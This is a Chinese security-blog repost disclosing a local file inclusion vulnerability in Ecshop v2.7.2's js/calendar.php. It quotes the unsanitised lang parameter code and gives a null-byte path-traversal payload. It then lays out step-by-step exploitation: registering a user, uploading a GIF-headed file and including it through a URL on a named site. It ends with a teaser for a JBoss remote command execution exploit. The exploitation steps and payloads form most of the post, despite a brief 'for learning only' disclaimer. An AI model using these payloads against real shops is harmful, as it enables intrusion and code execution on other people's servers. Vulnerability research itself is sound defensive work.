Ecshop 最新版(v272) 本地包含漏洞 Oday

admin 2021年4月3日18:54:08评论88 views字数 865阅读2分53秒阅读模式

    注:发布本文只是出于学习的目的,请勿用无非法用途!

    很久前就发现了,今天发布出来吧,其实很简单,就是很多人没有注意这里:

直接看代码:

“js/calendar.php”:

$lang = (!empty($_GET['lang']))
? trim($_GET['lang']) : 'zh_cn';//没有过滤,很明显的包含漏洞 by: ℡Mr.LP

if (!file_exists('../languages/' . $lang . '/calendar.php'))
{
$lang = 'zh_cn';
}

require(dirname(dirname(__FILE__)) . '/data/config.php');
header('Content-type: application/x-javascript; charset=' . EC_CHARSET);

include_once('../languages/' . $lang . '/calendar.php');//这里包含,需要截断 by: ℡Mr.

测试代码:

//需要 magic_quotes_gpc = Off

/js/calendar.php?lang=../index.php%00.

(注意后面有个“.”)

利用:

1、注册用户

2、然后上传GIF89a头的GIF文件欺骗,

3、然后包含,如:http://www.lpboke.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.

(注意后面有个“.”)

文章来源于lcx.cc:Ecshop 最新版(v272) 本地包含漏洞 Oday

相关推荐: JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution

JBoss JMXInvokerServlet JMXInvoker 0.3 - 远程代码执行 /* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luc…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:54:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ecshop 最新版(v272) 本地包含漏洞 Odayhttps://cn-sec.com/archives/319114.html

发表评论

匿名网友 填写信息